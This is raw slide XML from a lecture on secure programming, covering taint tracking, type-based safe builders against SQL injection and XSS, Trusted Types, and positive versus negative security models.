              <a:t>There may be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 sources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 sinks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many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> operations that remove or propagate taint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possibly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> propagate taint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Missing one is easy, resulting in false negatives or positives.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Too much data may get tainted, resulting in unworkable number of false positives.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Static taint analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>of large programs becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.            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False positives or false negatives may be unavoidable.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/>
              <a:t>Doing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>intra-procedural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>analysis (i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per method/function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inter-procedural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>analysis (i.e. whole program) may keep things feasible, typically at the expense of precision </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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8079-6688-6488-ADA4-5A6808C526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5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2B792-963F-08FB-644D-CC168C532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c) Safe builders</a:t>
            </a:r>
            <a:endParaRPr lang="en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531C44-6288-14A8-951C-FE920A54F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C10A5-9509-DDC1-6067-654C26B4EC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622256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Safe Builder approach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Effectively the opposite approach to tainting:                                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>instead of tracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> data,                                   we track </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untainted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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe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data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Key idea: we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type system of the programming languag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>e to distinguish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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted’ </a:t>
            </a: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that does not  to be encoded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solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘untrusted’ </a:t>
            </a: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that needs to be encoded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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for a specific context                                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a different type for each context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>One special addition to conventional type systems:                                         distinguishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compile-time constants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string literals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Used by Google’s Trusted Types in Chrome to combat DOM-based XSS.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58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Safe builder for SQL injection  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1570"/>
            <a:ext cx="7761288" cy="4960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Suppose we have an unsafe API method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nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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executeDynamicSQLQuery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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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600" dirty="0"/>
              <a:t>We define a new ‘wrapper’ String type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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800" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>and a function that executes such a wrapped string</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1800" b="1" dirty="0">
              <a:latin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nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void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safeExecuteSQLQuery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(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SafeSQLquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s){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altLang="nl-NL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executeDynamicSQLCommand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altLang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the string in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altLang="nl-NL" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-285750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We now define functions to create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endParaRPr lang="en-GB" altLang="nl-NL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800100" lvl="1">
              <a:lnSpc>
                <a:spcPct val="10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compiled-time constant can be turned into a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sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    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create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(@CompiletimeConstant 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  <a:p>
            <a:pPr marL="800100" lvl="1">
              <a:lnSpc>
                <a:spcPct val="10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 we can append a string to an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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> using a function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QLquery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appendSQL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SafeSQLquery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q,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String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s)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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>which will apply the right encoding to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 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Type system guarantees that user inputs in queries are properly escaped. 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We disallow use of the old unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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executeDynamicSQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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00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76A9-6DC9-762D-6257-B82BE706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Safe builders for several contexts</a:t>
            </a:r>
            <a:endParaRPr lang="en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9D98-97F2-CE96-D351-C3107714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If we use string-like data in several contexts, each with their own encoding, we can introduce  a different String-like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>typesa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for each, e.g.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="105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SafeS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QLquery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SafeOSCommand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SafeFilename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</a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="10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with association constructors or factory methods for each, e.g.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="16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endParaRPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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create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(@CompiletimeConstant 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concatHTML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h1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,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h2)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h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, String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s) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="105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appendHTML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h,s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appendSQL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h,s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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> would use different encodings for the parameter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</a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pP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We could introduce unsafe loopholes that we evaluate by hand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1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SafeHTML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unsafeCreate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(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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AD53-74B2-54AC-2C8F-FAF6C620AE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40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F20D-0B0A-86A5-CDDB-87C985AA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Positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>security models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93E2-BBBF-4A52-F757-AB3CA289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choice between positive vs negative security models comes back in several places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Tainting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is 'safe' unless tainted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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe builders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= data is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'unsafe' unless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type says otherwise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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow lists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deny lists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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security requirements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attack scenario/threat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8E224-9B7B-38DC-2084-7A866A5CCA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17517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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF8FFED-4279-9C10-DC5E-C558BD10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441" y="2130121"/>
            <a:ext cx="7773120" cy="2344320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2903" dirty="0"/>
              <a:t>The messy business of preventing XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="2177" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A9D947-5745-81D4-9807-5E6C0940B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7936317-650B-4972-9E88-7E0D86914246}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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6"/>
            <a:ext cx="7761288" cy="603370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminology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Untrusted input travels as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sink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Sinks can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external API or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rgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bug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3047348" y="1709366"/>
            <a:ext cx="3039066" cy="262113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334747" y="1756345"/>
            <a:ext cx="104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source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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6816073" y="2193900"/>
            <a:ext cx="1552518" cy="8825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7" name="Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6503023" y="2377544"/>
            <a:ext cx="698614" cy="382384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9078"/>
            <a:ext cx="774968" cy="7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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1988401" y="2210030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575986" y="2495157"/>
            <a:ext cx="1517522" cy="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2" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6167243" y="2437598"/>
            <a:ext cx="713652" cy="3823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404937" y="2550323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3061203" y="4641250"/>
            <a:ext cx="3053225" cy="49243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Platform libraries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846219" y="20531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sink</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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985530" y="2059787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015897" y="2414820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814313" y="4247913"/>
            <a:ext cx="497629" cy="14582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3" name="Explosie 2 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3746701" y="4538311"/>
            <a:ext cx="698614" cy="262693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" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3915174" y="4311639"/>
            <a:ext cx="301461" cy="4455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3991127" y="4417026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5162348" y="3484062"/>
            <a:ext cx="151346" cy="514512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1" name="Vrije vorm 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3089349" y="3152140"/>
            <a:ext cx="1314705" cy="1178358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1724779"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1228507"/>
              <a:gd name="connsiteX1" fmla="*/ 265246 w 1724779"/>
              <a:gd name="connsiteY1" fmla="*/ 314107 h 1228507"/>
              <a:gd name="connsiteX2" fmla="*/ 307127 w 1724779"/>
              <a:gd name="connsiteY2" fmla="*/ 823658 h 1228507"/>
              <a:gd name="connsiteX3" fmla="*/ 572373 w 1724779"/>
              <a:gd name="connsiteY3" fmla="*/ 893459 h 1228507"/>
              <a:gd name="connsiteX4" fmla="*/ 984202 w 1724779"/>
              <a:gd name="connsiteY4" fmla="*/ 642174 h 1228507"/>
              <a:gd name="connsiteX5" fmla="*/ 760837 w 1724779"/>
              <a:gd name="connsiteY5" fmla="*/ 390888 h 1228507"/>
              <a:gd name="connsiteX6" fmla="*/ 1284348 w 1724779"/>
              <a:gd name="connsiteY6" fmla="*/ 349007 h 1228507"/>
              <a:gd name="connsiteX7" fmla="*/ 1724098 w 1724779"/>
              <a:gd name="connsiteY7" fmla="*/ 530491 h 1228507"/>
              <a:gd name="connsiteX8" fmla="*/ 1382070 w 1724779"/>
              <a:gd name="connsiteY8" fmla="*/ 663114 h 1228507"/>
              <a:gd name="connsiteX9" fmla="*/ 1256428 w 1724779"/>
              <a:gd name="connsiteY9" fmla="*/ 949301 h 1228507"/>
              <a:gd name="connsiteX10" fmla="*/ 1249447 w 1724779"/>
              <a:gd name="connsiteY10" fmla="*/ 1228507 h 12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4779" h="1228507">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="107029" y="88415"/>
                  <a:pt x="214058" y="176831"/>
                  <a:pt x="265246" y="314107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="316434" y="451383"/>
                  <a:pt x="255939" y="727099"/>
                  <a:pt x="307127" y="823658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="358315" y="920217"/>
                  <a:pt x="459527" y="923706"/>
                  <a:pt x="572373" y="893459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="685219" y="863212"/>
                  <a:pt x="952791" y="725936"/>
                  <a:pt x="984202" y="642174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1015613" y="558412"/>
                  <a:pt x="710813" y="439749"/>
                  <a:pt x="760837" y="390888"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="810861" y="342027"/>
                  <a:pt x="1123805" y="325740"/>
                  <a:pt x="1284348" y="349007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1444891" y="372274"/>
                  <a:pt x="1707811" y="478140"/>
                  <a:pt x="1724098" y="530491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1740385" y="582842"/>
                  <a:pt x="1460015" y="593312"/>
                  <a:pt x="1382070" y="663114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1304125" y="732916"/>
                  <a:pt x="1278532" y="855069"/>
                  <a:pt x="1256428" y="949301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1234324" y="1043533"/>
                  <a:pt x="1241885" y="1136020"/>
                  <a:pt x="1249447" y="1228507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2986915" y="2881089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2" name="Vrije vorm 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3103310" y="2833894"/>
            <a:ext cx="2118106" cy="955146"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2115143"/>
              <a:gd name="connsiteY0" fmla="*/ 296889 h 864657"/>
              <a:gd name="connsiteX1" fmla="*/ 495591 w 2115143"/>
              <a:gd name="connsiteY1" fmla="*/ 282929 h 864657"/>
              <a:gd name="connsiteX2" fmla="*/ 488611 w 2115143"/>
              <a:gd name="connsiteY2" fmla="*/ 101445 h 864657"/>
              <a:gd name="connsiteX3" fmla="*/ 677075 w 2115143"/>
              <a:gd name="connsiteY3" fmla="*/ 3723 h 864657"/>
              <a:gd name="connsiteX4" fmla="*/ 1040043 w 2115143"/>
              <a:gd name="connsiteY4" fmla="*/ 227087 h 864657"/>
              <a:gd name="connsiteX5" fmla="*/ 732916 w 2115143"/>
              <a:gd name="connsiteY5" fmla="*/ 415552 h 864657"/>
              <a:gd name="connsiteX6" fmla="*/ 1326229 w 2115143"/>
              <a:gd name="connsiteY6" fmla="*/ 478373 h 864657"/>
              <a:gd name="connsiteX7" fmla="*/ 1605435 w 2115143"/>
              <a:gd name="connsiteY7" fmla="*/ 108425 h 864657"/>
              <a:gd name="connsiteX8" fmla="*/ 1877661 w 2115143"/>
              <a:gd name="connsiteY8" fmla="*/ 87484 h 864657"/>
              <a:gd name="connsiteX9" fmla="*/ 2114987 w 2115143"/>
              <a:gd name="connsiteY9" fmla="*/ 338770 h 864657"/>
              <a:gd name="connsiteX10" fmla="*/ 1842761 w 2115143"/>
              <a:gd name="connsiteY10" fmla="*/ 492333 h 864657"/>
              <a:gd name="connsiteX11" fmla="*/ 1598455 w 2115143"/>
              <a:gd name="connsiteY11" fmla="*/ 562135 h 864657"/>
              <a:gd name="connsiteX12" fmla="*/ 1437912 w 2115143"/>
              <a:gd name="connsiteY12" fmla="*/ 736639 h 864657"/>
              <a:gd name="connsiteX13" fmla="*/ 1633356 w 2115143"/>
              <a:gd name="connsiteY13" fmla="*/ 855301 h 864657"/>
              <a:gd name="connsiteX14" fmla="*/ 2073106 w 2115143"/>
              <a:gd name="connsiteY14" fmla="*/ 848321 h 8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5143" h="864657">
                <a:moveTo>
                  <a:pt x="0" y="296889"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="207078" y="306196"/>
                  <a:pt x="414156" y="315503"/>
                  <a:pt x="495591" y="282929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="577026" y="250355"/>
                  <a:pt x="458364" y="147979"/>
                  <a:pt x="488611" y="101445"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="518858" y="54911"/>
                  <a:pt x="585170" y="-17217"/>
                  <a:pt x="677075" y="3723"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="768980" y="24663"/>
                  <a:pt x="1030736" y="158449"/>
                  <a:pt x="1040043" y="227087"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049350" y="295725"/>
                  <a:pt x="685218" y="373671"/>
                  <a:pt x="732916" y="415552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="780614" y="457433"/>
                  <a:pt x="1180809" y="529561"/>
                  <a:pt x="1326229" y="478373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1471649" y="427185"/>
                  <a:pt x="1513530" y="173573"/>
                  <a:pt x="1605435" y="108425"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1697340" y="43277"/>
                  <a:pt x="1792736" y="49093"/>
                  <a:pt x="1877661" y="87484"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1962586" y="125875"/>
                  <a:pt x="2120804" y="271295"/>
                  <a:pt x="2114987" y="338770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2109170" y="406245"/>
                  <a:pt x="1928850" y="455106"/>
                  <a:pt x="1842761" y="492333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1756672" y="529560"/>
                  <a:pt x="1665930" y="521417"/>
                  <a:pt x="1598455" y="562135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1530980" y="602853"/>
                  <a:pt x="1432095" y="687778"/>
                  <a:pt x="1437912" y="736639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1443729" y="785500"/>
